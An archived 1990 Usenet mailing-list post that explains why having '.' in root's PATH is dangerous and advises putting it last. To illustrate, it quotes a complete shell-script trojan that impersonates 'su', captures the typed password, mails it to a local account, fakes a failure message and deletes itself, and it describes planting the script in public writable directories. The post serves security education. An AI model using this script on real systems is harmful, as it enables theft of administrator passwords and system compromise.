. in $path
John H Merritt
merritt at iris613.gsfc.nasa.gov
Fri Apr 13 04:07:48 AEST 1990
In article <283:doelz at urz.unibas.ch> doelz at urz.unibas.ch (Reinhard Doelz) writes:
>
>
>The *root* may not use it, otherwise it's fine. Imagine you're su'ing around
>and some weird guy aliased ls to rm.
^^^^^^^ <-- he means, has a command or program named ...
More concretely it prevents some one gaining root capabilities through
a trojan horse. Consider the following program, from UNIX Today April 2, 1990.
Chump=$1
stty -echo
echo "Password:\c"
read ChumpsPwd
echo ""
stty echo
echo $Chump\'s passwd is $ChumpsPwd \
| mail cybrpunk
sleep 1
echo "su:Sorry"
rm su
This program is placed in every public writable directory and
eventually someone will execute it; it reports failure the first time and
the user thinks he typed the wrong password and never knows he just
gave the root password away.
Another popular trojan horse is 'ls'.
If you must have '.' in the path, it should be last.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
John H. Merritt # Yesterday I knew nothing,
Applied Research Corporation # Today I know that.
merritt at iris613.gsfc.nasa.gov #
More information about the Comp.sys.sgi
mailing list